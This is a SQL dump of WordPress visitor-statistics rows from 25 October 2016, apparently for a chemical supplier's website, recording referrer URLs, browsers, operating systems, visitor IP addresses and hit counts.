INSERT INTO `wp_statistics_visitor` VALUES (11460, '2016-10-25', 'https://r.search.yahoo.com/_ylt=AwrSbD_2Vw9YZUkA3rBXNyoA;_ylu=X3oDMTEydmd2N3A4BGNvbG8DZ3ExBHBvcwM0BHZ0aWQDQjI3NzlfMQRzZWMDc3I-/RV=2/RE=1477429367/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fkrytox-automotive-lubricants%2f/RK=0/RS=AIvuISRkiogc6NeRZmGRwU97StI-', 'Chrome', 'Windows', '45.0.2454.101', '', '61.149.158.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11461, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.140.158.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11462, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '37.187.131.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11463, '2016-10-25', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&sqi=2&ved=0ahUKEwiHt7f_gvbPAhVKPT4KHaD5DxUQFgg5MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-52%2F&usg=AFQjCNFdgoJUoi3B25XK9qLqegNqbQkfzg&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '67.224.83.50', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11464, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '68.193.188.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11465, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.34.116.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11466, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.63.197.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11467, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11468, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11469, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.56.9.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11470, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.91.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11471, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11472, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11473, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.238.112.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11474, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'MSIE', 'Windows', '11.0', '', '130.76.24.24', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11475, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.45.9.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11476, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.16.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11477, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.140.69.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11478, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '130.76.24.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11479, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.214.223.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11480, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.44.84.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11481, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.242.88.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11482, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '65.112.8.65', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11483, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.3.208.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11484, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.233.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11485, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11486, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.33.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11487, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwib--HYi_bPAhVIh1QKHYpXDzYQFgg6MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '149.63.0.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11488, '2016-10-25', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11489, '2016-10-25', 'https://www.google.com/search?q=high+temp+lubricant+spray&prmd=sivn&ei=4FUPWK_INunYjwTRz7OgAQ&start=10&sa=N&biw=360&bih=615&dpr=3', 'Chrome', 'Android', '44.0.2403.133', '', '174.219.1.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11490, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.99.5.194', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11491, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.249.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11492, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.195.183.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11493, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.126.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11494, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.62.112.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11495, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.164.225.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11496, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.70.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11497, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11498, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.16', '', '113.77.86.62', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11499, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.3.2743.134', '', '115.79.206.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11500, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '129.93.146.173', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11501, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi-w9HOkfbPAhWFaT4KHbI1C_UQFggnMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2Fepikure-curing-agents%2Fepikure-w-composites%2F&usg=AFQjCNHzMMm4nfWayelq-CkvH8QGcxHOCg&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11502, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '4.16.99.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11503, '2016-10-25', 'https://www.bing.com/', 'Firefox', 'Windows', '49.0', '', '128.63.164.56', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11504, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11505, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.199.0.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11506, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.170.195.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11507, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.188.18.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11508, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.129.235.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11509, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.31.94.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11510, '2016-10-25', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '35.0.1916.153', '', '201.79.251.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11511, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '28.0.1500.94', '', '172.58.56.193', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11512, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11513, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.158.95.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11514, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.250.185.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11515, '2016-10-25', 'https://www.google.com.do/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.166.108.26', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11516, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.172.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11517, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.235.25.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11518, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.135.238.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11519, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '77.234.44.141', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11520, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '82.81.86.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11521, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.186.134.27', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11522, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.206.130.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11523, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.216.166.131', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11524, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11525, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwifm6m4l_bPAhWETCYKHW5aCGIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '137.237.240.61', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11526, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '62.210.111.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11527, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.30', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11528, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjQ-qvcl_bPAhVDbH4KHVonDLcYABAA&sig=AOD64_2eMZQWAAr5nkWXKeSC38zBo_0_OQ&rct=j&frm=1&q=&ved=0ahUKEwiSiqbcl_bPAhWJ6YMKHWFbB0MQ0QwIGg&adurl=', 'MSIE', 'Windows', '10.0', '', '69.160.157.129', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11529, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.155.192.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11530, '2016-10-25', 'https://www.bing.com/search?q=epon+815c&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11531, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11532, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.222.212.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11533, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '70.177.0.36', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11534, '2016-10-25', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.99', '', '5.34.241.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11535, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '5.34.241.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11536, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiSltfdmfbPAhVF6iYKHTZ0CVIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-580582%2F&usg=AFQjCNFPeZBf-lu3w44UOE1nejRxLgrt9A&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '204.128.192.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11537, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi6ydi1mvbPAhXj24MKHYCWCloQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '71.184.66.186', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11538, '2016-10-25', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '119.160.193.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11539, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '10.136.1.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11540, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11541, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '51.254.212.37', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11542, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.13.112.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11543, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.194.243.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11544, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.121.170.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11545, '2016-10-25', 'https://www.miller-stephenson.com', 'Screaming', 'Unknown', 'Unknown', '', '31.168.110.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11546, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.62.147.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11547, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '45.36.33.28', '000', 44, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11548, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '204.128.192.32', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11549, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.101.203.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11550, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.00', '', '194.44.138.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11551, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.44.138.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11552, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.199.37.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11553, '2016-10-25', 'https://www.bing.com/search?q=miller+stephenson+ms-460c&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '76.8.142.82', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11554, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.146.26.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11555, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11556, '2016-10-25', 'https://lvov.mistr-x.org/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11557, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '70.32.50.211', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11558, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '180.245.132.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11559, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11560, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.41.176.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11561, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.134.232.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11562, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.68.46.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11563, '2016-10-25', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0ahUKEwjil6qEovbPAhXsCMAKHe23BcgQFgg6MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240az%2F&usg=AFQjCNEwNURE0QzS32SjwIAsgrEmgcDasg&bvm=bv.136593572,d.d24', 'MSIE', 'Windows', '11.0', '', '213.131.162.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11564, '2016-10-25', 'https://www.google.de/', 'Chrome', 'Windows', '53.0.2785.143', '', '134.105.172.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11565, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '151.142.132.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11566, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwimgdLko_bPAhVFgn4KHYflCVYYABAA&ei=ZHsPWPeEI-rPjwSmrpagCw&sig=AOD64_31CcE9GLinI0MymosPaWg93ZQAhg&rct=j&q=&sqi=2&ved=0ahUKEwj3xs3ko_bPAhXq54MKHSaXBbQQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '149.32.192.38', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11567, '2016-10-25', 'https://www.google.com.sg/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.90.29.217', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11568, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.46.213.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11569, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.32.66.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11570, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.154.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11571, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/solvents/', 'MSIE', 'Windows', '11.0', '', '140.180.252.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11572, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.1.142', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11573, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '68.115.182.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11574, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.240.15.120', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11575, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.124.19.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11576, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11577, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.35.175.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11578, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6', '', '163.172.14.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11579, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '107.77.169.1', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11580, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '120.88.228.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11581, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.255.156.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11582, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.47.2.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11583, '2016-10-25', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.137.118.49', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11584, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.68.80.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11585, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '50.0.2661.86', '', '54.229.222.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11586, '2016-10-25', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '173.78.224.59', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11587, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '5.0', '', '46.229.167.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11588, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0b10pre', '', '46.229.167.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11589, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11590, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.26.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11591, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.101.6.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11592, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.122.54.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11593, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '205.193.209.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11594, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11595, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.53.21.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11596, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '74.117.145.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11597, '2016-10-25', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '76.8.142.82', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11598, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.208.177.59', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11599, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.3.239.94', '000', 2, 0); 
